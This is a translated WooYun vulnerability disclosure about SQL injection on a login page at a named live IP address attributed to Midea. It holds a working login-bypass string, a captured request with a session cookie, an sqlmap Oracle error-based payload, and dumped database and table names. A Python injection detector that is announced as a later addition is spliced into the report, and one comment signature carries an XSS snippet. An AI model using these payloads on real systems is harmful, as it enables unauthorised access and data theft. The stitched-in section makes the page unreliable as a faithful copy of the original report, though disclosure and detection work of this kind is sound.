Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0123129

Title: Oracle injection on a Midea site (a considerable amount of data)

Vendor: midea.com

Author: DloveJ

Submitted: 2015-06-27 22:53

Fixed: 2015-08-11 23:32

Published: 2015-08-11 23:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-06-27: Details sent to the vendor, awaiting vendor action
2015-06-27: Vendor confirmed; details visible to the vendor only
2015-07-07: Details disclosed to core white hats and relevant domain experts
2015-07-17: Details disclosed to regular white hats
2015-07-27: Details disclosed to intern white hats
2015-08-11: Details disclosed to the public

Brief description:

Midea???meide??

Detailed description:

http://120.132.154.11:8080/web/rdlogin.jsp


0x00

Logging in with admin'or'1'='1

Not that it gets you much, though.

[screenshot: 1.jpg]


0x01

Captured login request:
POST /web/SubmitLogin.do HTTP/1.1
Host: 120.132.154.11:8080
Proxy-Connection: keep-alive
Content-Length: 125
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://120.132.154.11:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://120.132.154.11:8080/web/SubmitLogin.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: CPCUserName=test; ch1=true; ch2=false; lastloginuser=test; entcode=mdrd; JSESSIONID=6By6VT5B2qn4HhyPT4PlmTvqXLGhQ5xJkwJv324RTww2YYBHXqtd!-549272955
value%28entcode1%29=mdrd&value%28entcode%29=mdrd&value%28userName%29=test&value%28password%29=test&Submit=%E7%99%BB+%E5%BD%95



current schema (equivalent to database on Oracle): 'MDRD'
Place: POST
Parameter: value(userName)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: value(entcode1)=mdrd&value(entcode)=mdrd&value(userName)=test' AND 8955=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(121)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (8955=8955) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(98)||CHR(107)||CHR(98)||CHR(58)||CHR(62))) FROM DUAL) AND 'uWtW'='uWtW&value(password)=test&Submit=? ?


available databases [4]:
[*] ETWMAIL
[*] MDRD
[*] SYS
[*] SYSTEM
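The sqlmap finding above boils down to one untrusted form field, value(userName), being concatenated into an Oracle query. From the defender's side the same request shape is what a WAF rule or a log-review script has to recognise. The script below is an added example (not part of the WooYun report or of the affected application): it percent-decodes an application/x-www-form-urlencoded login body, checks each parameter against a small set of Oracle error-based injection indicators (a closing quote followed by AND/OR, XMLType(), CHR()|| string assembly, a sub-select from DUAL) and returns one verdict per request. The indicator names, the classify() labels and the three sample bodies are constructed for this example; the benign body copies the captured request's layout, and the other two follow the shapes shown in 0x00 and in the sqlmap output.

```python
"""Flag Oracle SQL-injection attempts in a URL-encoded login POST body.

Added example for the report above; not part of the WooYun page or of the
affected application. Parameter names follow the captured request
(value(userName) etc.); the sample bodies are constructed.
"""
import re
from urllib.parse import parse_qs

# Indicator patterns. The labels are our own (assumption: a generic sketch of
# what a WAF rule or a log-review script would check, not a vendor rule set).
INDICATORS = {
    # a closing quote immediately followed by a boolean operator: test' AND ...
    "quote_then_boolean": re.compile(r"'\s*(?:or|and)\b", re.I),
    # XMLType() is the Oracle function sqlmap's error-based technique leans on
    "oracle_xmltype": re.compile(r"\bxmltype\s*\(", re.I),
    # strings assembled from CHR(n)||CHR(n)... to sidestep quote filtering
    "chr_concat": re.compile(r"\bchr\s*\(\s*\d+\s*\)\s*\|\|", re.I),
    # a sub-select against DUAL, Oracle's one-row dummy table
    "dual_subselect": re.compile(r"\(\s*select\b.*?\bfrom\s+dual\b", re.I | re.S),
}


def decode_body(body):
    """Percent-decode a form body into {parameter: first value}.

    parse_qs decodes keys too, so value%28userName%29 becomes value(userName),
    and '+' becomes a space exactly as the servlet container would see it."""
    parsed = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def scan_value(value):
    """Return the names of every indicator that fires on one parameter value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def inspect_request(body):
    """Map each parameter that triggered at least one indicator to its hits."""
    hits = {}
    for name, value in decode_body(body).items():
        found = scan_value(value)
        if found:
            hits[name] = found
    return hits


def classify(body):
    """Collapse the per-parameter hits into a single verdict for the request."""
    all_hits = {h for found in inspect_request(body).values() for h in found}
    if all_hits & {"oracle_xmltype", "chr_concat", "dual_subselect"}:
        return "oracle-error-based-injection"
    if "quote_then_boolean" in all_hits:
        return "tautology-auth-bypass-attempt"
    return "clean"


# Constructed sample bodies (same parameter layout as the captured request).
BENIGN = ("value%28entcode1%29=mdrd&value%28entcode%29=mdrd"
          "&value%28userName%29=test&value%28password%29=test"
          "&Submit=%E7%99%BB+%E5%BD%95")
# userName = admin'or'1'='1, the 0x00 login attempt
TAUTOLOGY = ("value%28entcode%29=mdrd"
             "&value%28userName%29=admin%27or%271%27%3D%271"
             "&value%28password%29=x&Submit=login")
# userName = test' AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||
#            (SELECT 1 FROM DUAL)||CHR(62))) FROM DUAL) AND 'a'='a
ERROR_BASED = ("value%28entcode%29=mdrd&value%28userName%29="
               "test%27+AND+1%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7C"
               "CHR%2858%29%7C%7C%28SELECT+1+FROM+DUAL%29%7C%7CCHR%2862%29%29%29"
               "+FROM+DUAL%29+AND+%27a%27%3D%27a"
               "&value%28password%29=test&Submit=login")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("tautology", TAUTOLOGY),
                        ("error-based", ERROR_BASED)):
        print(label, classify(body), inspect_request(body))
```

Matching on decoded values matters: the captured body carries its parameter names percent-encoded, and a rule applied to the raw body would miss keys and values alike. Detection of this kind is a compensating control only; the actual fix for the finding is to bind value(userName) and value(password) as parameters of a prepared statement instead of concatenating them into the query.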


The sqlmap output ran past the screen, so I'll just copy what was displayed:

| CPCWFATTACH |
| CPCWFOBJ |
| CPCWFOBJTEMP |
| CPCWFPROC |
| CPCWFPROCH |
| CPCWFPROCNOTICE |
| CPCWFPROCSIGN |
| CPCWFPROCSIGNTEMP |
| CPCWFPROCTASK |
| CPCWFPROCTEMP |
| CPCWFPROCTEMPNOTICE |
| CPCWFPROCTEMP_20100413 |
| CPCWFPROCTYPE |
| CPCWFPUBLISH |
| CPCWFPUBTEMP |
| CPCWFREF |
| CPCWFSHEET |
| CPCWFTEMP |
| CPCWFTEMPCROSS |
| CPCWFTEMPREF |
| CPCWFTEMPS |
| CPCWFUSERRANGE |
| CPCWORKLOG |
| CPCWORKPLAN |
| CPCWORKSPACE |
| CPCWORKTIME |
| CPCWORKTIMECFG |
| CPCWSENT |
| CPCWSOBJ |
| CPCWSREF |
| CPCWSREF20120317 |
| CPC_COLUMN |
| CPC_VENDOR |
| DELIVER_ADDRESS |
| DELIVER_ADDRESS_CONSTRAINT |
| DELIVER_ADDRESS_INTERFACE |
| DELIVER_MESSAGE |
| DELIVER_MESSAGE20130122 |
| DELIVER_MESSAGE_FORMERGE |
| DELIVER_MESSAGE_H |
| DELIVER_MESSAGE_HISTORY |
| DELIVER_MESSAGE_INT |
| DELIVER_MESSAGE_INT20121029 |
| DELIVER_MESSAGE_INTERFACE |
| DELIVER_MESSAGE_INT_LOG |
| DELIVER_MESSAGE_LOG |
| DELIVER_MESSAGE_SURE_INTERFACE |
| DELIVER_MESSAGE_SURE_INT_LOG |
| DELIVER_MESSAGE_TEST |
| DELIVER_MI_20140422 |
| DELIVER_OUTBILL_HEAD_INTERFACE |
| DELIVER_OUTBILL_HEAD_INT_LOG |
| DELIVER_OUTBILL_LINE_INTERFACE |
| DELIVER_OUTBILL_LINE_INT_LOG |
| EBS_CPC_USER_RELATION |
| FXH20110919 |
| INNER_ITEM_ID20120314 |
| INTERFACECHECK |
| INTERFACESTATE |
| INTERFACEVENDOR |
| INTERFACE_SYNCHRONIZED |
| INTVARCHAR |
| INVOICENO_SURE_INTERFACE |
| INVOICENO_SYN_INTERFACE |
| INVOICE_BILL_HEAD_INTERFACE |
| INVOICE_BILL_LINE_INTERFACE |
| INVOICE_BILL_RECEIVE_INTERFACE |
| INVOICE_CREATE_HEAD_INTERFACE |
| INVOICE_CREATE_LINE_INTERFACE |
| INV_IN_BILL_HEAD |
| INV_IN_BILL_HEAD_H |
| INV_IN_BILL_LINE |
| INV_IN_BILL_LINE_H |
| INV_MONTHSUM |
| INV_OUT_BILL_HEAD |
| INV_OUT_BILL_HEAD0929 |
| INV_OUT_BILL_HEAD120330 |
| INV_OUT_BILL_HEAD20110927 |
| INV_OUT_BILL_HEAD20120314 |
| INV_OUT_BILL_HEAD20120319 |
| INV_OUT_BILL_HEAD20120406 |
| INV_OUT_BILL_HEAD_FORMERGE |
| INV_OUT_BILL_HEAD_H |
| INV_OUT_BILL_HEAD_ID20120319 |
| INV_OUT_BILL_HEAD_LOG |
| INV_OUT_BILL_LINE |
| INV_OUT_BILL_LINE120330 |
| INV_OUT_BILL_LINE20120319 |
| INV_OUT_BILL_LINE_H |
| INV_OUT_BILL_LINE_LOG |
| INV_VENDOR_INV |
| INV_VENDOR_INV20110926 |
| INV_VENDOR_INV20110927 |
| INV_VENDOR_INV20120221DEL |
| INV_VENDOR_INV_H |
| INV_VENDOR_INV_INTERFACE |
| ITEM |
| ITEM20120314 |
| ITEM_20101018 |
| ITEM_20111130 |
| ITEM_20120315 |
| ITEM_BIG_KIND |
| ITEM_H |
| ITEM_INTERFACE |
| ITEM_INTERFACE20120314 |
| ITEM_INTERFACE20120314_1 |
| ITEM_INTERFACE_20101018 |
| ITEM_INVENTORY |
| ITEM_KIND_USER_RELATION |
| ITEM_ORG |
| ITEM_SUPPLY_RATE |
| ITEM_SUPPLY_RATE20120314 |
| ITEM_SUPPLY_RATE_INTERFACE |
| LOGINLOG |
| LOGINLOG_ALL_BAK |
| LOGINLOG_ALL_BAK1 |
| MESSAGE_CLOSE_INTERFACE |
| MESSAGE_CLOSE_INT_LOG |
| MODIFY_BUSINESS_HISTORY |
| NOTICE_READ_SYNCHRON_INTERFACE |
| NOTICE_SYNCHRON_ATTACH_INT |
| NOTICE_SYNCHRON_INTERFACE |
| OCKRESULT |
| OCKRESULT_INTERFACE |
| ORDER_CHANGE_INTERFACE |
| ORDER_CHANGE_INT_LOG |
| ORDER_STATUS_SURE_INTERFACE |
| ORDER_STATUS_SURE_INT_LOG |
| ORDER_VENDOR_INFO |
| ORDER_VENDOR_INFO_INTERFACE |
| ORG_AREA |
| OUTBILL_DEAL_HEAD_INTERFACE |
| OUTBILL_DEAL_HEAD_INT_LOG |
| OUTBILL_DEAL_LINE_INTERFACE |
| OUTBILL_DEAL_LINE_INT_LOG |
| PRIVATE_TRADE |
| PURCHASE_INBILL_HEAD_INTERFACE |
| PURCHASE_INBILL_LINE_INTERFACE |
| PURCHASE_ORDER_HEAD |
| PURCHASE_ORDER_HEAD_H |
| PURCHASE_ORDER_HEAD_INTERFACE |
| PURCHASE_ORDER_HEAD_INT_LOG |
| PURCHASE_ORDER_LINE |
| PURCHASE_ORDER_LINE_H |
| PURCHASE_ORDER_LINE_INTERFACE |
| PURCHASE_ORDER_LINE_INT_LOG |
| PURCHASE_ORDER_PLAN |
| QUESTION_TYPE |
| REQUEST_LEAD_BILL20111219 |
| REQUEST_LEAD_BILL2013311 |
| REQUEST_LEAD_BILL_HEAD |
| REQUEST_LEAD_BILL_HEAD20110927 |
| REQUEST_LEAD_BILL_HEAD20110928 |
| REQUEST_LEAD_BILL_HEAD20111006 |
| REQUEST_LEAD_BILL_HEAD20111007 |
| REQUEST_LEAD_BILL_HEAD20111010 |
| REQUEST_LEAD_BILL_HEAD20111011 |
| REQUEST_LEAD_BILL_HEAD20111219 |
| REQUEST_LEAD_BILL_HEAD2012 |
| REQUEST_LEAD_BILL_HEAD20120227 |
| REQUEST_LEAD_BILL_HEAD20120314 |
| REQUEST_LEAD_BILL_HEAD20120427 |
| REQUEST_LEAD_BILL_HEAD_110811 |
| REQUEST_LEAD_BILL_HEAD_H |
| REQUEST_LEAD_BILL_HEAD_LOG |
| REQUEST_LEAD_BILL_LINE |
| REQUEST_LEAD_BILL_LINE20110928 |
| REQUEST_LEAD_BILL_LINE20111006 |
| REQUEST_LEAD_BILL_LINE20111007 |
| REQUEST_LEAD_BILL_LINE20111010 |
| REQUEST_LEAD_BILL_LINE20120227 |
| REQUEST_LEAD_BILL_LINE20120427 |
| REQUEST_LEAD_BILL_LINE2021 |
| REQUEST_LEAD_BILL_LINE_H |
| REQUEST_LEAD_BILL_LINE_LOG |
| REQUEST_LEAD_HEAD_FORMERGE |
| REQUEST_LEAD_HEAD_INTERFACE |
| REQUEST_LEAD_LINE_INTERFACE |
| RFI_ANSWER_CHOOSE_BANK |
| RFI_ANSWER_CHOOSE_FILED |
| RFI_ANSWER_JUDGE_MARKING |
| RPTDS |
| RPTSP |
| RPTTABLE |
| SALE_BILL_PRICE_DIFF |
| SALE_OUTBILL_HEAD_INTERFACE |
| SALE_OUTBILL_LINE_INTERFACE |
| SCM_INIT_VENDOR |
| SCM_INIT_VENDOR20110929 |
| SCP_REQUEST_LEAD_HEAD_INT |
| SCP_REQUEST_LEAD_HEAD_INT0625 |
| SCP_REQUEST_LEAD_LINE_INT |
| SCP_STATEMENT_CUSTOMER_INT |
| SCP_STATEMENT_CUSTOMER_INT0919 |
| SCP_STATEMENT_CUST_INT120314 |
| SCP_STATEMENT_HEAD_INT0919 |
| SCP_STATEMENT_HEAD_INTER120314 |
| SCP_STATEMENT_HEAD_INTERFACE |
| SCP_STATEMENT_VENDOR_INT |
| SCP_STATEMENT_VENDOR_INT0919 |
| SCP_STATEMENT_VENDOR_INT120314 |
| SCP_VEND_FORFEIT_INTERFACE |
| SHIPMENTAREA20120316 |
| SHIPMENT_HEADER20120621 |
| SHIPMENT_HEADER2013311 |
| SHIPMENT_LINE20120621 |
| SP_LOG |
| STCPUPLOADFILELIST |
| STCP_NEWDOCRECEIVE_LIB |
| STCP_PS_BOM_INT |
| STCP_PS_DOCSEND_INT |
| STCP_PS_ECNDRAWLINE_INT |
| STCP_PS_ECN_INT |
| STCP_PS_ITEM_INT |
| STCP_PS_SEND_SAMP_MESSAGE_INT |
| STCP_PS_SEND_SAMP_MES_DR_INT |
| STCP_SEND_SAMP_DRAWREL |
| STCP_SEND_SAMP_HEAD |
| STCP_SEND_SAMP_LINE |
| STCP_SEND_SAMP_MESSAGE |
| STCP_SEND_SAMP_MESSAGE_DRAWREL |
| STCP_SP_DOCSEND_FEEDBACK_INT |
| STCP_SP_SEND_SAMP_DRAWREL_INT |
| STCP_SP_SEND_SAMP_HEAD_INT |
| STCP_SP_SEND_SAMP_LINE_INT |
| STCP_SP_SEND_SAMP_MESSAGE_INT |
| STCP_SP_SEND_SAMP_MES_DR_INT |
| SUB_INV_SET |
| SUB_INV_SET_INTERFACE |
| SYS_TEMP_FBT |
| TEMP20140902ZRL |
| TEMP20150323ZRL1 |
| TENANT_CUSTOMER |
| TENANT_CUSTOMER_ROLE |
| TMP_AP_STATEMENT_C_LINE |
| TMP_AP_STATEMENT_HEAD |
| TMP_AP_STATEMENT_V_LINE |
| TMP_DELIVER_MESSAGE_04 |
| TMP_INIT_VENDOR |
| TMP_INVBILL_1111 |
| TMP_INV_OUT_BILL_HEAD |
| TMP_INV_OUT_BILL_HEAD1205 |
| TMP_INV_OUT_BILL_LINE |
| TMP_INV_OUT_BILL_LINE1205 |
| TMP_INV_VENDOR_INV |
| TMP_MESSAGE |
| TMP_QITONG |
| TMP_REQUEST_LEAD_BILL20110929 |
| TMP_REQUEST_LEAD_BILL_HEAD |
| TMP_REQUEST_LEAD_BILL_HEAD1205 |
| TMP_REQUEST_LEAD_BILL_LINE |
| TMP_REQUEST_LEAD_BILL_LINE1205 |
| TMP_SERPC |
| TMP_SHIPMENT_HEAD20110929 |
| TMP_SHIPMENT_HEADER |
| TMP_SHIPMENT_LINE |
| TMP_TABLE |
| TMP_VENDOR1008 |
| TMP_VENDOR100801 |
| TMP_ZZH_3_2 |
| TRADE_INFO |
| TREETEST |
| UOM |
| USER_ACCESS_20110928 |
| USER_ACCESS_RELATION |
| USER_ACCESS_RELATION0928 |
| USER_ACCESS_RELATION20110928 |
| USER_AUTHENTICATE |
| USER_INFO |
| USER_INFO20110927 |
| USER_INFO20110928 |
| USER_INFO_XL |
| USPTOTEST1 |
| VARFACECHECK |
| VAT_REGI20110927 |
| VENDORLOC |
| VENDOR_INTERFACE |
| VENDOR_INTERFACE20110927 |
| VENDOR_LIMIT_AMOUNT20120317 |
| VENDOR_LIMIT_AMOUNT20120321 |
| VENDOR_SITE |
| VENDOR_SITE0920 |
| VENDOR_SITE0928 |
| VENDOR_SITEDEL20110921 |
| VENDOR_SITE_INTERFACE |
| WEBSERVICEMSG |
| WEBSERVICEMSG20120316 |
| WEBSERVICEMSG_LOG |
| WEBSERVICE_INFO |
| WEB_DATA_FIELD_MAPPING |
| WEB_DATA_TRANSFER_CONFIG |
| WIP_BK_CLASS |
+--------------------------------+


Proof of vulnerability:

[screenshot: 2.jpg]

[screenshot: 3.jpg]

Fix recommendation:

Copyright notice: when reposting, please credit the source DloveJ@WooYun


Vulnerability response

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2015-06-27 23:31

Vendor reply:

Thanks to @DloveJ for the heads-up; we are currently verifying the vulnerability information.

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-06-28 10:34 | 0x 80 ( Regular white hat | Rank:1301 Vulns:398 | A security company is hiring system ops, pentesters, security ops...)

    Did you only get one rank?

  2. 2015-06-28 10:37 | DloveJ ( Regular white hat | Rank:1107 Vulns:200 | <a href=javascrip:alert('xss')>s</a> click...)

    @0x 80 Yes

  3. 2015-06-28 10:40 | 0x 80 ( Regular white hat | Rank:1301 Vulns:398 | A security company is hiring system ops, pentesters, security ops...)

    That's rough.. only 1 coin for an injection

  4. 2015-06-28 10:46 | DloveJ ( Regular white hat | Rank:1107 Vulns:200 | <a href=javascrip:alert('xss')>s</a> click...)

    @0x 80 The vendor is a bit stingy...

  5. 2015-07-17 23:51 | 0x 80 ( Regular white hat | Rank:1301 Vulns:398 | A security company is hiring system ops, pentesters, security ops...)

    So rough

  6. 2015-08-25 09:12 | Midea Group (WooYun vendor)

    @DloveJ @0x 80 @DloveJ @0x 80 @DloveJ @0x 80 @DloveJ @0x 80 @DloveJ @0x 80 @DloveJ @0x 80 Not stingy any more: this system isn't Midea's own, it's the developer's own test environment.